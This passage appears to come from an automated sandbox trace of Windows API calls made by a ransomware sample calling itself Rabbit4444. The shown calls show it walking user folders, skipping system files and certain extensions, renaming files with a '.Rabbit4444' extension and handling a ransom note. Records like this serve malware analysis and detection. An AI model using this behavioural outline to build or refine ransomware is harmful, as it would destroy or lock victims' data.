lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.047] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16235745111) returned 1 [0071.047] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=55440) returned 1 [0071.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0071.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0071.047] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdb90, lpName=0x0) returned 0x27c [0071.048] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdb90) returned 0x70000 [0071.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1102a0 [0071.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1102a0 | out: hHeap=0xe0000) returned 1 [0071.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0071.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0071.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0071.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0071.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.052] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16236273747) returned 1 [0071.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0071.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0071.052] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.053] CloseHandle (hObject=0x27c) returned 1 [0071.053] CloseHandle (hObject=0x260) returned 1 [0071.053] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\1504704835.Rabbit4444") returned 164 [0071.053] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\1504704835" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\1504704835"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\1504704835.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\1504704835.rabbit4444"), dwFlags=0x1) returned 1 [0071.054] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a2d0a7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe771be10, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9c01bafe, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0071.054] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.054] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0071.054] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.055] lstrlenW (lpString="eventbeacons.dat") returned 16 [0071.055] lstrlenW (lpString="Rabbit4444") returned 10 [0071.055] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.055] lstrlenW (lpString=".dll") returned 4 [0071.055] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.055] lstrlenW (lpString=".lnk") returned 4 [0071.055] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.055] lstrlenW (lpString=".ini") returned 4 [0071.055] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.055] lstrlenW (lpString=".sys") returned 4 [0071.055] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.055] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a2d0a7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7c2ce5f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9c01bafe, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.055] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0071.056] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0071.056] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.056] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0071.056] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.056] lstrlenW (lpString="imprbeacons.dat") returned 15 [0071.056] lstrlenW (lpString="Rabbit4444") returned 10 [0071.056] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.056] lstrlenW (lpString=".dll") returned 4 [0071.056] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.056] lstrlenW (lpString=".lnk") returned 4 [0071.056] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.056] lstrlenW (lpString=".ini") returned 4 [0071.056] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.056] lstrlenW (lpString=".sys") returned 4 [0071.056] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.056] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a2d0a7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7c2ce5f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9c01bafe, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0071.056] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0071.056] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0071.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0071.057] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0071.057] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0071.058] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.058] CloseHandle (hObject=0x260) returned 1 [0071.058] CloseHandle (hObject=0x228) returned 1 [0071.058] GetCurrentThreadId () returned 0xd98 [0071.059] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0071.059] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469" [0071.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0071.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469" [0071.059] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\" [0071.059] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\.BFC0E91B00AE8A0620D3" [0071.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0071.065] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.068] FlushFileBuffers (hFile=0x228) returned 1 [0071.069] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.069] CloseHandle (hObject=0x228) returned 1 [0071.070] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469") returned 142 [0071.070] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.070] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51556bba, ftLastAccessTime.dwHighDateTime=0x1d32719, ftLastWriteTime.dwLowDateTime=0xf3ada9e4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0071.070] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.070] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.070] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.070] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.070] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51556bba, ftLastAccessTime.dwHighDateTime=0x1d32719, ftLastWriteTime.dwLowDateTime=0xf3ada9e4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.070] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.070] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.070] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.070] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.070] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.070] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3ada9e4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3ada9e4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3ada9e4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.070] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.070] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.070] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a6be24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4a6be24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc4a920e0, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x13d00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504704827", cAlternateFileName="150470~1")) returned 1 [0071.070] lstrcmpiW (lpString1="1504704827", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.070] lstrcmpiW (lpString1="1504704827", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.070] lstrcmpiW (lpString1="1504704827", lpString2="Rabbit4444.exe") returned -1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2=".") returned 1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="..") returned 1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="windows") returned -1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="bootmgr") returned -1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="pagefile.sys") returned -1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="boot") returned -1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="ids.txt") returned -1 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="NTUSER.DAT") returned -1 [0071.071] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504704827" | out: lpString1="1504704827") returned="1504704827" [0071.071] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\1504704827", dwFileAttributes=0x0) returned 1 [0071.071] lstrlenW (lpString="1504704827") returned 10 [0071.071] lstrlenW (lpString="Rabbit4444") returned 10 [0071.071] lstrcmpiW (lpString1="1504704827", lpString2="Rabbit4444") returned -1 [0071.071] lstrlenW (lpString=".dll") returned 4 [0071.072] lstrcmpiW (lpString1="4827", lpString2=".dll") returned 1 [0071.072] lstrlenW (lpString=".lnk") returned 4 [0071.072] lstrcmpiW (lpString1="4827", lpString2=".lnk") returned 1 [0071.072] lstrlenW (lpString=".ini") returned 4 [0071.072] lstrcmpiW (lpString1="4827", lpString2=".ini") returned 1 [0071.072] lstrlenW (lpString=".sys") returned 4 [0071.072] lstrcmpiW (lpString1="4827", lpString2=".sys") returned 1 [0071.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\1504704827" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\1504704827"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.072] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.072] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16238290023) returned 1 [0071.072] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=81152) returned 1 [0071.072] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0071.072] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0071.072] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14000, lpName=0x0) returned 0x27c [0071.073] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14000) returned 0x70000 [0071.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110cf0 [0071.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0071.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110cf0 | out: hHeap=0xe0000) returned 1 [0071.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0071.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0071.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0071.079] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16238934332) returned 1 [0071.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0071.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0071.079] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.079] CloseHandle (hObject=0x27c) returned 1 [0071.080] CloseHandle (hObject=0x260) returned 1 [0071.080] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\1504704827.Rabbit4444") returned 164 [0071.080] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\1504704827" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\1504704827"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\1504704827.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210469\\1504704827.rabbit4444"), dwFlags=0x1) returned 1 [0071.080] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1ec2c2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x514bdf74, ftLastAccessTime.dwHighDateTime=0x1d32719, ftLastWriteTime.dwLowDateTime=0x9bfcf60d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0071.080] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.080] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.080] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.080] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0071.081] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.081] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0071.081] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210469\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.081] lstrlenW (lpString="eventbeacons.dat") returned 16 [0071.081] lstrlenW (lpString="Rabbit4444") returned 10 [0071.082] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.082] lstrlenW (lpString=".dll") returned 4 [0071.082] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.082] lstrlenW (lpString=".lnk") returned 4 [0071.082] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.082] lstrlenW (lpString=".ini") returned 4 [0071.082] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.082] lstrlenW (lpString=".sys") returned 4 [0071.082] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.082] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdf610868, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9bfcf60d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 